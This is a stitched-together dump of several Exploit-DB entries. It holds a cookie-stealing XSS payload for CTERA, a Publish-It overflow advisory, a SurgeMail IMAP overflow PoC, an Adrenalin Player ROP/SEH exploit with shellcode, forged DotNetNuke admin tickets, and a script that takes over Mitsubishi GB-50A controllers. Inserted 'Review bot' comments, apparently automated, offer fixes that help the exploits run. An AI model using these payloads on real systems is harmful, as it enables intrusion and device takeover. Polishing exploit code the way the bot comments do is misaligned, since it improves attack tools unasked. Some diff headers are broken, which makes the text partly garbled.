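+# Date: [11-Mar-2013]
+# Exploit Author: [Luigi Vezzoso]
+# Vendor Homepage: [http://www.ctera.com]
+# Version: [3.2.29.0 and 3.2.42.0 ]
+# Tested on: [ctera os]
+# CVE : [CVE-2013-2639]
+ 
+#OVERVIEW
+Standard Ctera User can define a particular “description” for a ProjectFolder that cause javascript code execution and HTML injection.
+ 
+#INTRODUCTION
+CTERA Networks (http://www.ctera.com)bridges the gap between cloud storage and local storage, providing optimized performance and end-to-end security. Our solutions accelerate deployment of cloud services and eliminate the costs associated with file servers, backup servers and tape drives. Service providers and enterprises use CTERA to deliver services such as backup, file sync and share, mobile collaboration, managed NAS and cloud on-ramping, based on the cloud infrastructure of their choice.
+ 
+#VULNERABILITY DESCRIPTION
+User can forge particular description on Project Folder that permit XSS, HTML Injection (add of link, images, button ecc). As the project folder can be shared with different users that vulnerability permit the grabbing of sessions cookies.
+ 
+For test the vuln: Create a Project Folder with the following description (the particular path depend of firmware version)
+</xml><img src="https://192.168.3.2/admingui/common.3.2.29.291012114828/script/ext/resources/images/default/grid/loading.gif" onload="alert(document.cookie);">
+<xml>
+#VERSIONS AFFECTED
+Tested on CTERA Cloud Storage OS version 3.2.29.0 and 3.2.42.0
+ 
+#SOLUTION
+The vendor mark as resolved on latest CTERA version 4.x
+ 
+#CREDITS
+Luigi Vezzoso
+email:  luigivezzoso@gmail.com
+skype:  luigivezzoso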
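--- a/platforms/windows/dos/31461.txt
+++ b/platforms/windows/dos/31461.txt
@@ -0,0 +1,189 @@
+Core Security - Corelabs Advisory
+http://corelabs.coresecurity.com/
+Publish-It Buffer Overflow Vulnerability
+1. *Advisory Information*
+Title: Publish-It Buffer Overflow Vulnerability
+Advisory ID: CORE-2014-0001
+Advisory URL:
+http://www.coresecurity.com/advisories/publish-it-buffer-overflow-vulnerability
+Date published: 2014-02-05
+Date of last update: 2014-02-05
+Vendors contacted: Poster Software
+Release mode: User release
+2. *Vulnerability Information*
+Class: Buffer overflow [CWE-119]
+Impact: Code execution
+Remotely Exploitable: No
+Locally Exploitable: Yes
+CVE Name: CVE-2014-0980
+3. *Vulnerability Description*
+Publish-It [1] is prone to a (client side) security vulnerability when
+processing .PUI files. This vulnerability could be exploited by a remote
+attacker to execute arbitrary code on the target machine, by enticing
+the user of Publish-It to open a specially crafted .PUI file.
+4. *Vulnerable Packages*
+. Publish-It v3.6d for Win XP.
+. Publish-It v3.6d for Win 7.
+. Other versions are probably affected too, but they were not checked.
+5. *Vendor Information, Solutions and Workarounds*
+There was no official answer from vendor after several attempts to
+report this vulnerability (see [Sec. 8]). As mitigation action, given
+that this is a client-side vulnerability, avoid to open untrusted .PUI
+files. Contact vendor for further information.
+6. *Credits*
+This vulnerability was discovered and researched by Daniel Kazimirow
+from Core Exploit Writers Team.
+7. *Technical Description / Proof of Concept Code*
+Below is shown the result of opening the Proof of concept file [2] on
+Windows XP SP3 (EN).
+/-----
+EAX 04040404
+ECX 00000325
+EDX FFFFFF99
+EBX 77F15B70 GDI32.SelectObject
+ESP 0012F5D4
+EBP 77F161C1 GDI32.GetStockObject
+ESI 0103A1E8
+EDI A50107D3
+EIP 04040404
+C 0 ES 0023 32bit 0(FFFFFFFF)
+P 0 CS 001B 32bit 0(FFFFFFFF)
+A 1 SS 0023 32bit 0(FFFFFFFF)
+Z 0 DS 0023 32bit 0(FFFFFFFF)
+S 0 FS 003B 32bit 7FFDF000(FFF)
+T 0 GS 0000 NULL
+D 0
+O 0 LastErr ERROR_SUCCESS (00000000)
+EFL 00000212 (NO,NB,NE,A,NS,PO,GE,G)
+ST0 empty -??? FFFF 00000001 00010002
+ST1 empty -??? FFFF 00000043 004F007A
+ST2 empty -??? FFFF 7590A3E7 FDBDC8F2
+ST3 empty -??? FFFF 00000043 0050007B
+ST4 empty 1.0000000000000000000
+ST5 empty -9.2233720368547758080e+18
+-----/
+The arbitrary value 0x04040404 is stored in the EIP register where our
+shellcode starts (just a software breakpoint 0xCC):
+/-----
+04040404 CC INT3
+04040405 CC INT3
+04040406 CC INT3
+04040407 CC INT3
+04040408 CC INT3
+04040409 CC INT3
+0404040A CC INT3
+0404040B CC INT3
+...
+-----/
+As a result, the normal execution flow can be altered in order to
+execute arbitrary code.
+8. *Report Timeline*
+. 2013-12-20:
+Core Security Technologies attempts to contact vendor. Publication date
+is set for Jan 21st, 2014.
+. 2014-01-06:
+Core attempts to contact vendor.
+. 2014-01-15:
+Core asks for confirmation of the initial contact e-mail.
+. 2014-01-15:
+Vendor sends an e-mail with a single word: "Confirmed".
+. 2014-01-16:
+Core sends a technical description and asks for an estimated release
+date. No reply received.
+. 2014-01-21:
+First release date missed.
+. 2014-01-27:
+Core attempts to contact vendor. No reply received.
+. 2014-02-05:
+After one month and a half trying to contact vendor the only reply from
+them was the word "Confirmed" and the advisory CORE-2014-0001 is
+published as 'User release'.
+9. *References*
+[1] http://www.postersw.com/.
+[2]
+http://www.coresecurity.com/system/files/attachments/2014/02/CORE-2014-0001-publish-it.zip
+http://www.exploit-db.com/sploits/31461.zip
+10. *About CoreLabs*
+CoreLabs, the research center of Core Security Technologies, is charged
+with anticipating the future needs and requirements for information
+security technologies. We conduct our research in several important
+areas of computer security including system vulnerabilities, cyber
+attack planning and simulation, source code auditing, and cryptography.
+Our results include problem formalization, identification of
+vulnerabilities, novel solutions and prototypes for new technologies.
+CoreLabs regularly publishes security advisories, technical papers,
+project information and shared software tools for public use at:
+http://corelabs.coresecurity.com.
+11. *About Core Security Technologies*
+Core Security Technologies enables organizations to get ahead of threats
+with security test and measurement solutions that continuously identify
+and demonstrate real-world exposures to their most critical assets. Our
+customers can gain real visibility into their security standing, real
+validation of their security controls, and real metrics to more
+effectively secure their organizations.
+Core Security's software solutions build on over a decade of trusted
+research and leading-edge threat expertise from the company's Security
+Consulting Services, CoreLabs and Engineering groups. Core Security
+Technologies can be reached at +1 (617) 399-6980 or on the Web at:
+http://www.coresecurity.com.
+12. *Disclaimer*
+The contents of this advisory are copyright (c) 2014 Core Security
+Technologies and (c) 2014 CoreLabs, and are licensed under a Creative
+Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
+License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
+13. *PGP/GPG Keys*
+This advisory has been signed with the GPG key of Core Security
+Technologies advisories team, which is available for download at
+http://www.coresecurity.com/files/attachments/core_security_advisories.asc.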
34
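--- a/platforms/windows/dos/31464.pl
+++ b/platforms/windows/dos/31464.pl
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/28377/info
+SurgeMail is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.
+Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected service. Failed exploit attempts will likely result in denial-of-service conditions.
+SurgeMail 3.8k4 is vulnerable; other versions may also be affected.
+#
+#
+# Surgemail stack overflow PoC exploit - latest version
+# Coded by Leon Juranic <leon.juranic@infigo.hr>
+# http://www.infigo.hr/en/
+#
+use IO::Socket;
+$host = "192.168.0.15";
+$user = "test";
+$pass = "test";
+$str = "//AA:";
+$sock = IO::Socket::INET->new(PeerAddr => $host,
+PeerPort => "143",
+Proto => "tcp") || die ("Cannot connect!!!\n");
+print $a = <$sock>;
+print $sock "a001 LOGIN $user $pass\r\n";
+print $a = <$sock>;
+print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";
+print $a = <$sock>;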
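Review bot: The header comment above `use IO::Socket` does not state that the trigger, as written, is post-authentication: a `LOGIN` with `$user`/`$pass` is sent and its response read before the oversized `LSUB` on the following line, so this PoC exercises an authenticated code path, and whether the same handling is reachable before a successful LOGIN is not shown here — a distinction that matters when rating exposure. I would add `# Note: the oversized LSUB is only sent after a LOGIN exchange; unauthenticated reachability is not demonstrated here` to the header block. As a point of style, the script has no `use strict; use warnings;`, and `$host`, `$user` and `$pass` are hard-coded lab values, which is worth a one-line comment so the file is not mistaken for a general-purpose checker.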

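--- a/platforms/windows/local/31386.rb
+++ b/platforms/windows/local/31386.rb
@@ -0,0 +1,127 @@
+#!/usr/bin env ruby
+# Exploit Title: Adrenalin Player 2.2.5.3 (.m3u) SEH-Buffer Overflow ASLR+DEP Bypass
+# Date: 3/2/2014
+# Exploit Author: Muhamad Fadzil Ramli
+# Vendor HomePage: http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
+# Software Link: http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
+# Version App: 2.2.5.3
+# Tested on: Windows 7 x86 - Version 6.1.7600
+# CVE:None
+# Notes:-
+# Offset to kernel32 - 0xF8C
+# Offset to virtualProtect - 0xC039
+filename = "motiv.m3u"
+rop = ''
+rop << [0x10129df6].pack('V') # PUSH ESP # POP ESI # RETN 0x10
+rop << [0x10135eaf].pack('V') * 5 # RETN
+rop << [0x1010c4c2].pack('V') # ADD ESP,20 # RETN
+rop << 'VVVV' # VirtualProtect()
+rop << 'WWWW' # return address
+rop << 'XXXX' # lpAddress
+rop << 'YYYY' # dwSize
+rop << 'ZZZZ' # flNewProtect
+rop << [0x1024bb98].pack('V') # lpOldProtect - writeable address
+rop << [0x10135eaf].pack('V') * 2 # RETN (ROP NOP)
+# kernel32 address
+rop << [0x1003de9f].pack('V') # PUSH ESI # POP EAX # MOV EAX,ESI # POP EDI # RETN
+rop << "AAAA" # FILLER
+rop << [0x1005de8e].pack('V') # XCHG EAX,EBP # RETN
+rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
+rop << [0x101201d6].pack('V') # POP EAX # RETN
+rop << [0xFFFFF074].pack('V') # OFFSET F8C
+rop << [0x101111e2].pack('V') # NEG EAX # RETN
+rop << [0x1013a5e4].pack('V') # ADD EAX,EBP # RETN
+rop << [0x1010010f].pack('V') # POP ECX # RETN
+rop << [0xFFFFFFFF].pack('V') #
+rop << [0x1012dd87].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
+rop << [0x1012014b].pack('V') # INC EAX # RETN
+# virtualProtect Address
+rop << [0x1002660b].pack('V') # XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
+rop << "XXXX" * 2 # FILLER
+rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
+rop << "AAAA" * 3 # FILLER
+rop << [0x101201d6].pack('V') # POP EAX # RETN
+rop << [0xFFFF3FC7].pack('V') # OFSET C039
+rop << [0x101111e2].pack('V') # NEG EAX # RETN
+rop << [0x1002660b].pack('V') # XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
+rop << "AAAA" * 2 # FILLER
+rop << [0x1013c584].pack('V') # SUB EAX,ECX # RETN
+rop << [0x1010010f].pack('V') # POP ECX # RETN
+rop << [0xFFFFFFFF].pack('V') #
+rop << [0x1012dd87].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
+# assign virtualprotect address
+rop << [0x1006798b].pack('V') * 8 # INC ESI # RETN
+rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
+rop << "AAAA" # FILLER
+# return address
+rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
+rop << [0x10135eaf].pack('V') # FILLER
+rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
+rop << [0x10135eaf].pack('V') # FILLER
+rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
+rop << [0x10135eaf].pack('V') # FILLER
+rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
+rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
+rop << "AAAA"
+# lpAddress
+rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
+rop << [0x10135eaf].pack('V') # FILLER
+rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
+rop << [0x10135eaf].pack('V') # RETN FILLER
+rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
+rop << [0x10135eaf].pack('V') # FILLER
+rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
+rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
+rop << "AAAA" # FILLER
+# dwSize
+rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
+rop << [0x10135eaf].pack('V') # FILLER
+rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
+rop << [0x101201d6].pack('V') # POP EAX # RETN
+rop << [0xfffffcff].pack('V') # 300
+rop << [0x101111e2].pack('V') # NEG EAX # RETN
+rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
+rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
+rop << "AAAA"
+# flNewProtect
+rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
+rop << [0x10135eaf].pack('V') # RETN FILLER
+rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
+rop << [0x101201d6].pack('V') # POP EAX # RETN
+rop << [0xffffffc0].pack('V') # 40
+rop << [0x101111e2].pack('V') # NEG EAX # RETN
+rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
+rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
+rop << "AAAA"
+# Execute VirtualProtect
+rop << [0x101263a0].pack('V') # XCHG EAX,ESP # RETN
+sc =
+"\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52" +
+"\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E" +
+"\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C" +
+"\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F" +
+"\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC"
+xploit = rop
+xploit << "\x90" * 256
+xploit << sc
+data = "A" * 2176
+data[24,xploit.length] = xploit
+data[2172+4,4] = [0x100d7aec].pack("V") # SEH - STACK PIVOT
+File.open(filename,'w') do |fd|
+fd.write data
+puts "exploit file size : #{data.length.to_s}"
+end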
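Review bot: The shebang on the first line of the file, `#!/usr/bin env ruby`, is missing the slash between `bin` and `env`, so the file cannot be executed directly and has to be handed to the interpreter explicitly; it should read `#!/usr/bin/env ruby`. As a point of style, the `File.open(filename,'w')` call at the end opens the output in text mode even though `data` is a byte buffer assembled with `pack('V')` and `"\x.."` literals; `'wb'` states that intent explicitly and avoids any platform newline translation. The header also lists `CVE:None`, which is fine, but the two `Offset to ...` notes would read better with a clause saying what they are relative to, since the comments name the offsets without their base.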


@ -0,0 +1,65 @@
?
Asseco SEE iBank FX Client <= 2.0.9.3 Local Privilege Escalation Vulnerability
Vendor: Asseco SEE
Product web page: http://www.asseco.com
Affected version: 2.0.9.3 (Build 22.06.2011) - Desktop/Enterprise Edition
1.2
1.1.5.1270 (Service Pack 5) - Desktop Edition
1.1.5.1247
1.0
Application download resource: http://24x7.com.mk/Download.aspx
http://www.24x7.rs/eng/content.asp?idmenu1=23&idmenu2=33
Summary: FX Client is an offline application for e-banking that is intended only
for legal entities.
Desc: The application is vulnerable to an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file with a
binary of choice. The vulnerability exist due to the improper permissions, with
the 'F' flag (full) for the 'Everyone' and 'Users' group, for the 'RichClient.exe'
and 'fxclient.exe' binary files making them world-writable. After you replace the
binary with your rootkit, on reboot you get SYSTEM privileges.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows XP Professional SP3 (EN) 32bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5168
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5168.php
CWE ID: 276
CWE URL: https://cwe.mitre.org/data/definitions/276.html
10.01.2014
---
C:\Program Files (x86)\PEXIM\FXClient>icacls RichClient.exe
RichClient.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\Program Files (x86)\PEXIM\FXClient>
--
C:\Program Files (x86)\Pexim Solutions\FX Client>icacls fxclient.exe
fxclient.exe Everyone:(F)
NT AUTHORITY\SYSTEM:(F)
Successfully processed 1 files; Failed processing 0 files
C:\Program Files (x86)\Pexim Solutions\FX Client>


@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/28391/info
DotNetNuke is prone to a weak encryption vulnerability.
An attacker can exploit this issue to decrypt sensitive data. Information obtained may lead to further attacks.
This issue affects DotNetNuke 4.8.1; other versions may also be affected.
// Step 1: Generate the two FormsAuthenticationTickets
FormsAuthenticationTicket ticket1 = new FormsAuthenticationTicket("admin", true, 10000);
FormsAuthenticationTicket ticket2 = new FormsAuthenticationTicket(2, "admin", System.DateTime.Now, System.DateTime.MaxValue, true, "Registered
Users;Subscribers;Administrators");
// Step 2: Encrypt the FormsAuthenticationTickets
string cookie1 = ".DOTNETNUKE=" + FormsAuthentication.Encrypt(ticket1);
string cookie2 = "portalroles=" + FormsAuthentication.Encrypt(ticket2);


@ -0,0 +1,44 @@
source: http://www.securityfocus.com/bid/28406/info
The Mitsubishi Electric GB-50A is prone to multiple authentication-bypass vulnerabilities.
Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible.
# you can get BeautifulSoup from:
# http://www.crummy.com/software/BeautifulSoup/#Download
from BeautifulSoup import BeautifulSoup
from httplib import HTTPConnection
import sys
ip = sys.argv[1]
template = '<Mnet Group="%%s" Drive="%s" />' % sys.argv[2].upper()
def post(data):
c = HTTPConnection(ip)
c.request('POST','/servlet/MIMEReceiveServlet',data,{'content-type':'text/xml'})
return BeautifulSoup(c.getresponse().read())
# first out what groups there are
soup = post("""
<?xml version="1.0" encoding="UTF-8"?>
<Packet>
<Command>getRequest</Command>
<DatabaseManager>
<ControlGroup>
<MnetList/>
</ControlGroup>
</DatabaseManager>
</Packet>
""")
group_nums = [(g['group']) for g in soup.findAll('mnetrecord')]
# now go through and set all the on/off bits to what we were told
soup = post("""
<?xml version="1.0" encoding="UTF-8"?>
<Packet>
<Command>setRequest</Command>
<DatabaseManager>
%s
</DatabaseManager>
</Packet>
""" % ('\n'.join([template%g for g in group_nums])))